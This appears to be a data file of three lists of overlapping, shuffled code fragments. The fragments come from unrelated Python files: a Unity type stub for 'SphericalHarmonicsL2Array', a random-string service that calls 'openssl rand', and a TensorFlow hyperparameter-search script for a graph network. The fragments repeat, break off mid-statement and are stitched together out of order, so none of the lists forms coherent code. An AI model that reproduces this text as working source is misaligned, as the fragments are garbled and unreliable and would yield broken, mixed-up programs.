[ "value): ''' :param key: Int32 :type key: System.Int32 or int :param value: SphericalHarmonicsL2", "UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array", ":type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param key: Int32 :type", "''' pass def __getitem__(self, key): ''' :param key: Int32 :type key: System.Int32 or", "value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param key:", "key: Int32 :type key: System.Int32 or int :returns: SphericalHarmonicsL2 :rtype: UnityEngine.SphericalHarmonicsL2 ''' pass", "SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param key: Int32", "key: Int32 :type key: System.Int32 or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2", "''' :param key: Int32 :type key: System.Int32 or int :returns: SphericalHarmonicsL2 :rtype: UnityEngine.SphericalHarmonicsL2", "def __setitem__(self, key, value): ''' :param key: Int32 :type key: System.Int32 or int", ":param key: Int32 :type key: System.Int32 or int :param value: SphericalHarmonicsL2 :type value:", "System.Int32 or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self,", "key): ''' :param key: Int32 :type key: System.Int32 or int :returns: SphericalHarmonicsL2 :rtype:", ":param key: Int32 :type key: System.Int32 or int :returns: SphericalHarmonicsL2 :rtype: UnityEngine.SphericalHarmonicsL2 '''", "import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns:", "or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key):", "Int32 :type key: System.Int32 or int :param value: 
SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 '''", "from UdonPie import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None):", "UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): ''' :param key: Int32 :type key:", "''' pass def __setitem__(self, key, value): ''' :param key: Int32 :type key: System.Int32", "<reponame>Grim-es/udon-pie-auto-completion from UdonPie import System from UdonPie import UnityEngine from UdonPie.Undefined import *", "UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array", "from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype:", "value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param key: Int32 :type key:", "from UdonPie import System from UdonPie import UnityEngine from UdonPie.Undefined import * class", "def __getitem__(self, key): ''' :param key: Int32 :type key: System.Int32 or int :returns:", "''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): ''' :param", "SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self,", "key: System.Int32 or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def", "pass def __setitem__(self, key, value): ''' :param key: Int32 :type key: System.Int32 or", "def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key,", "__setitem__(self, key, value): ''' :param key: Int32 :type key: System.Int32 or int :param", ":param value: SphericalHarmonicsL2 :type value: 
UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param", "SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): ''' :param key: Int32", "arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): '''", ":returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): ''' :param key:", ":rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value): ''' :param key: Int32 :type", "''' :param key: Int32 :type key: System.Int32 or int :param value: SphericalHarmonicsL2 :type", "class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def", ":type key: System.Int32 or int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass", "int :param value: SphericalHarmonicsL2 :type value: UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): '''", "__new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass def __setitem__(self, key, value):", "UdonPie import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): '''", "import * class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array '''", "* class SphericalHarmonicsL2Array: def __new__(cls, arg1=None): ''' :returns: SphericalHarmonicsL2Array :rtype: UnityEngine.SphericalHarmonicsL2Array ''' pass", "import System from UdonPie import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def", "__getitem__(self, key): ''' :param key: Int32 :type key: System.Int32 or int :returns: SphericalHarmonicsL2", "key, 
value): ''' :param key: Int32 :type key: System.Int32 or int :param value:", "UdonPie import System from UdonPie import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array:", "System from UdonPie import UnityEngine from UdonPie.Undefined import * class SphericalHarmonicsL2Array: def __new__(cls,", "pass def __getitem__(self, key): ''' :param key: Int32 :type key: System.Int32 or int", "UnityEngine.SphericalHarmonicsL2 ''' pass def __getitem__(self, key): ''' :param key: Int32 :type key: System.Int32" ]
[]
[ "_use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int)", "int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) ->", "length: int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def", "Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, }", "int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length:", "lru_cache from typing import Callable, Dict, List from imagination.decorator.service import registered @registered() class", "= { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]:", "{ RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return", "not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str:", "in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return", "str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return", "'-base64', 
str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip()", "typing import Callable, Dict, List from imagination.decorator.service import registered @registered() class Randomizer: def", "return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip()", "str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class", "method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) ->", "return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl',", "RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys())", "self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl',", "<filename>keymaster/common/service/randomizer.py<gh_stars>0 import subprocess from functools import lru_cache from typing import Callable, Dict, List", "import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64:", "Dict, List from imagination.decorator.service import registered @registered() class Randomizer: def __init__(self): 
self.__known_generator_map: Dict[str,", "import lru_cache from typing import Callable, Dict, List from imagination.decorator.service import registered @registered()", "List from imagination.decorator.service import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable]", "class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex,", "raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand',", "def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64", "str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX =", "self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod", "from functools import lru_cache from typing import Callable, Dict, List from imagination.decorator.service import", "imagination.decorator.service import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = {", "def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property", "def randomize(self, method: str, length: int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method)", "subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() 
@staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand',", "@staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod:", "Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self)", "subprocess from functools import lru_cache from typing import Callable, Dict, List from imagination.decorator.service", "self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def", "self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def", "@lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int):", "return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if method not in self.__known_generator_map:", "method: str, length: int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length)", "-> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str:", "import Callable, Dict, List from imagination.decorator.service import registered @registered() class Randomizer: def __init__(self):", "from typing import Callable, Dict, List from imagination.decorator.service import registered @registered() class Randomizer:", "@staticmethod def _use_openssl_base64(length: int) -> str: return 
subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def", "'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex',", "functools import lru_cache from typing import Callable, Dict, List from imagination.decorator.service import registered", "_use_openssl_hex(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 =", "Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) ->", "from imagination.decorator.service import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] =", "__init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1)", "int) -> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64'", "-> str: return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX", "-> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if method not", "str, length: int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod", "'-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX = 'openssl:hex' class UnknownRandomizationMethodError(RuntimeError): pass", 
"sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if method not in self.__known_generator_map: raise", "if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int)", "@property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length:", "'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX = 'openssl:hex' class UnknownRandomizationMethodError(RuntimeError):", "registered @registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64,", "known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if method", "def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if", "def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64', str(length)]).decode().strip() @staticmethod def _use_openssl_hex(length:", "subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX = 'openssl:hex' class", "List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str, length: int): if method not in", "} @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method: str,", "randomize(self, method: str, length: int): if method not in self.__known_generator_map: raise UnknownRandomizationMethodError(method) return", "import subprocess from functools import lru_cache from 
typing import Callable, Dict, List from", "@registered() class Randomizer: def __init__(self): self.__known_generator_map: Dict[str, Callable] = { RandomizerMethod.OPENSSL_BASE64: self._use_openssl_base64, RandomizerMethod.OPENSSL_HEX:", "UnknownRandomizationMethodError(method) return self.__known_generator_map[method](length) @staticmethod def _use_openssl_base64(length: int) -> str: return subprocess.check_output(['openssl', 'rand', '-base64',", "return subprocess.check_output(['openssl', 'rand', '-hex', str(length)]).decode().strip() class RandomizerMethod: OPENSSL_BASE64 = 'openssl:base64' OPENSSL_HEX = 'openssl:hex'", "self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self, method:", "RandomizerMethod.OPENSSL_HEX: self._use_openssl_hex, } @property @lru_cache(maxsize=1) def known_methods(self) -> List[str]: return sorted(self.__known_generator_map.keys()) def randomize(self,", "Callable, Dict, List from imagination.decorator.service import registered @registered() class Randomizer: def __init__(self): self.__known_generator_map:" ]
[ "data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth = True", "{2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,", "for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture = a3d", "base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir])", "from data_loader import data_helper as helper # capture the config path from the", "{3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data generator", "arguments # then process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json')", "from Utils.utils import get_args from data_loader import data_helper as helper # capture the", "instance of the model you want model = invariant_basic(config, data) # create trainer", "a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth =", "Utils.utils import get_args from data_loader import data_helper as helper # capture the config", "DataGenerator from models.invariant_basic import invariant_basic from trainers.trainer import Trainer from Utils.config import process_config", "config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i) for i in range(2,8)]: for", "gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create an instance of the model", "trainer = Trainer(sess, model, data, config) # here you train your model acc,", "os.path.join(base_summary_folder, 
\"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir])", "Utils.config import process_config from Utils.dirs import create_dirs from Utils import doc_utils from Utils.utils", "data_loader import data_helper as helper # capture the config path from the run", "config.gpu import tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir", "summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) #", "= trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\")", "config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import", "fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir", "pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean std =", "all the previous components to it trainer = Trainer(sess, model, data, config) #", "model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def", "from models.invariant_basic import invariant_basic from trainers.trainer import Trainer from Utils.config import process_config from", "Trainer from Utils.config import process_config from Utils.dirs import create_dirs from Utils import doc_utils", "path from the run arguments # then process the json configuration file config", "experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i) for i", 
"generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig =", "Trainer(sess, model, data, config) # here you train your model acc, loss, _", "= {3}\".format(lr, a1d, a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data", "tf.Session(config=gpuconfig) # create an instance of the model you want model = invariant_basic(config,", "[0.00008*(2**i) for i in range(2,8)]: for a1d in [[5],[10]]: for a3d in [[5],", "_ = trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df =", "pass all the previous components to it trainer = Trainer(sess, model, data, config)", "lr in [0.00008*(2**i) for i in range(2,8)]: for a1d in [[5],[10]]: for a3d", "and pass all the previous components to it trainer = Trainer(sess, model, data,", "= config.gpus_list gpuconfig.gpu_options.allow_growth = True sess = tf.Session(config=gpuconfig) # create an instance of", "a1d config.architecture = a3d config.fc = fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d", "your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc = fully", "model you want model = invariant_basic(config, data) # create trainer and pass all", "= curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d", "+ \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d =", "in range(2,8)]: for a1d in [[5],[10]]: for a3d in [[5], [10],[15]]: for fully", "a1d in [[5],[10]]: for a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate", "np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean std = {0}\".format(np.std(acc))) return 
np.mean(acc)", "import create_dirs from Utils import doc_utils from Utils.utils import get_args from data_loader import", "process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf import numpy as", "base_exp_name = config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config)", "json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1", "as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create the experiments", "= a3d config.fc = fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc", "tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"])", "= a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False) gpuconfig.gpu_options.visible_device_list = config.gpus_list gpuconfig.gpu_options.allow_growth", "as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy", "as tf import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name", "data.config.learning_rate=lr data.config.architecture2d = a1d data.config.architecture3d = a3d data.config.fc = fully gpuconfig = tf.ConfigProto(allow_soft_placement=True,", "here you train your model acc, loss, _ = trainer.train() sess.close() tf.reset_default_graph() import", "= lr config.architecture2d = a1d config.architecture = a3d config.fc = fully config.exp_name =", 
"config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir =", "# then process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"]", "create trainer and pass all the previous components to it trainer = Trainer(sess,", "run arguments # then process the json configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple", "file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as tf", "sess = tf.Session(config=gpuconfig) # create an instance of the model you want model", "= tf.Session(config=gpuconfig) # create an instance of the model you want model =", "it trainer = Trainer(sess, model, data, config) # here you train your model", "= {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d, a3d,", "config.fc = fully config.exp_name = base_exp_name + \" lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr,", "create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in [0.00008*(2**i) for i in range(2,8)]:", "tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create the experiments dirs create_dirs([config.summary_dir,", "sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc =", "config) # here you train your model acc, loss, _ = trainer.train() sess.close()", "# create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr in", "data = DataGenerator(config) for lr in [0.00008*(2**i) for i in range(2,8)]: for a1d", 
"invariant_basic from trainers.trainer import Trainer from Utils.config import process_config from Utils.dirs import create_dirs", "doc_utils from Utils.utils import get_args from data_loader import data_helper as helper # capture", "configuration file config = process_config('/Users/jiahe/PycharmProjects/gnn multiple inputs/configs/parameter_search_config.json') os.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu import tensorflow.compat.v1 as", "process_config from Utils.dirs import create_dirs from Utils import doc_utils from Utils.utils import get_args", "trainer.train() sess.close() tf.reset_default_graph() import pandas as pd def summary_10fold_results(summary_dir): df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc", "config.learning_rate = lr config.architecture2d = a1d config.architecture = a3d config.fc = fully config.exp_name", "trainer and pass all the previous components to it trainer = Trainer(sess, model,", "data) # create trainer and pass all the previous components to it trainer", "fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d =", "df = pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean", "= pd.read_csv(summary_dir+\"/per_epoch_stats.csv\") acc = np.array(df[\"val_accuracy\"]) print(\"Results\") print(\"Mean Accuracy = {0}\".format(np.mean(acc))) # print(\"Mean std", "components to it trainer = Trainer(sess, model, data, config) # here you train", "lr={0}_a2d={1}_a3d = {2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc =", "the previous components to it trainer = Trainer(sess, model, data, config) # here", "import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name = config.exp_name # create", "\" lr={0}_a2d={1}_a3d = 
{2}_fc = {3}\".format(lr, a1d,a3d,fully) curr_dir = os.path.join(base_summary_folder, \"lr={0}_a2d={1}_a3d = {2}_fc", "for a3d in [[5], [10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d", "from Utils import doc_utils from Utils.utils import get_args from data_loader import data_helper as", "range(2,8)]: for a1d in [[5],[10]]: for a3d in [[5], [10],[15]]: for fully in", "[10],[15]]: for fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture =", "import get_args from data_loader import data_helper as helper # capture the config path", "fully in [[50,50],[20,20]]: config.learning_rate = lr config.architecture2d = a1d config.architecture = a3d config.fc", "= a1d config.architecture = a3d config.fc = fully config.exp_name = base_exp_name + \"", "the model you want model = invariant_basic(config, data) # create trainer and pass", "previous components to it trainer = Trainer(sess, model, data, config) # here you", "models.invariant_basic import invariant_basic from trainers.trainer import Trainer from Utils.config import process_config from Utils.dirs", "tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name =", "a3d, fully)) config.summary_dir = curr_dir create_dirs([curr_dir]) # create your data generator data.config.learning_rate=lr data.config.architecture2d", "config.exp_name # create the experiments dirs create_dirs([config.summary_dir, config.checkpoint_dir]) data = DataGenerator(config) for lr", "model = invariant_basic(config, data) # create trainer and pass all the previous components", "import tensorflow.compat.v1 as tf import numpy as np tf.set_random_seed(1) base_summary_folder = config.summary_dir base_exp_name", "config.architecture2d = a1d config.architecture = a3d config.fc = fully config.exp_name = base_exp_name +", "helper # capture the config path from the run arguments # then process", "import 
